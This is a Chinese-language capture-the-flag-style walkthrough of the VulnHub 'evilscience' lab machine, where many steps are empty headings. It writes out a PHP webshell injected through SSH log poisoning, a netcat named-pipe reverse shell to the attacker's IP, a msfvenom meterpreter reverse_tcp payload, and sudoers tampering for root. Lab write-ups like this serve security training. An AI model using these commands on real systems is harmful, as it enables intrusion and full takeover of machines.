kali渗透综合靶机(十六)--evilscience靶机

一、靶机下载

下载链接：https://download.vulnhub.com/theether/theEther_1.0.1.zip

二、evilscience靶机搭建

将下载好的靶机环境，用VMware导入即可使用，文件->打开


成功导入虚拟机之后，打开即可

三、攻击过程

kali IP：192.168.212.6
靶机IP：192.168.212.12

1、主机发现

2、端口扫描

方法一：

方法二：

3、端口服务识别

4、漏洞查找与利用

访问目标网站

目录扫描

没有发现有用信息
查看网页发现http://192.168.10.195/index.php?file=about.php 测试存在本地文件包含

为了直观的看到测试结果，这里使用Burpsuite处理http请求。
通过尝试包含Linux系统的配置文件，发现存在一定的限制。
如：包含/etc/passwd发现没有结果。

之后测试了几个常见的Apache日志的路径：
/var/log/apache/access.log/var/log/apache2/access.log/var/www/logs/access.log/var/log/access.log
均无结果。

猜测可能是更改了配置文件的路径，尝试读Apache2的配置文件，/etc/apache2/apache2.conf，发现也是失败。

尝试通过php伪协议读取php文件源码，也无果。
file=php://filter/convert.base64-encode/resource=index.php

结合之前信息探测的结果，靶机只开通了http与ssh服务。Apache的日志包含失败，尝试包含ssh的登陆日志。

成功读到ssh的登陆日志。

获取shell

获取一句话Webshell
使用一句话作为用户名登陆靶机的ssh。ssh ‘<?php system($_GET['w']);?>’@192.168.212.12

SSH的日志会记录此次登陆行为，这样就可以把一句话写入ssh的日志文件。测试一下是否成功：

测试phpinfo

成功写入并执行

可以看到一句话已经成功写入。

mknod backpipe p && nc 测试机IP 监听端口 0<backpipe | /bin/bash 1>backpipe

url编码后：

mknod+backpipe+p+%26%26+nc+测试机IP+监听端口+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

mknod+backpipe+p+%26%26+nc+192.168.212.6+6666+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

kali打开监听

提权一

然后用python -c ‘import pty;pty.spawn("/bin/bash")’ 重新打开一个终端

上图看到用python -c 打开的一个终端还是受限的,需要在用 awk ‘BEGIN{system("/bin/bash")}’ 重新打开一个终端

Sudo -l查看是否属于sudo组

可以使用sudo权限不需要密码执行xxxlogauditorxxx.py，查看一下该文件的权限, 该py文件的配置错误，导致可以直接以root权限执行命令

运行一下该py文件，发现是审计日志的程序。 查看Apache2的日志文件，发现是执行了cat命令，但是因为权限不够，没有执行成功。

msfvenom生成一个payload,上传到目标,增加执行权限
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=8888 -f elf > shell.elf

靶机下载shell.elf

sudo运行该脚本

Metasploit 设置监听 use exploit/multi/handler

提权二

首先给/etc/sudoers加写入权限

然后把当前用户以不用密码的登录方式添加到sudo组

更多web安全工具与存在漏洞的网站搭建源码，收集整理在知识星球。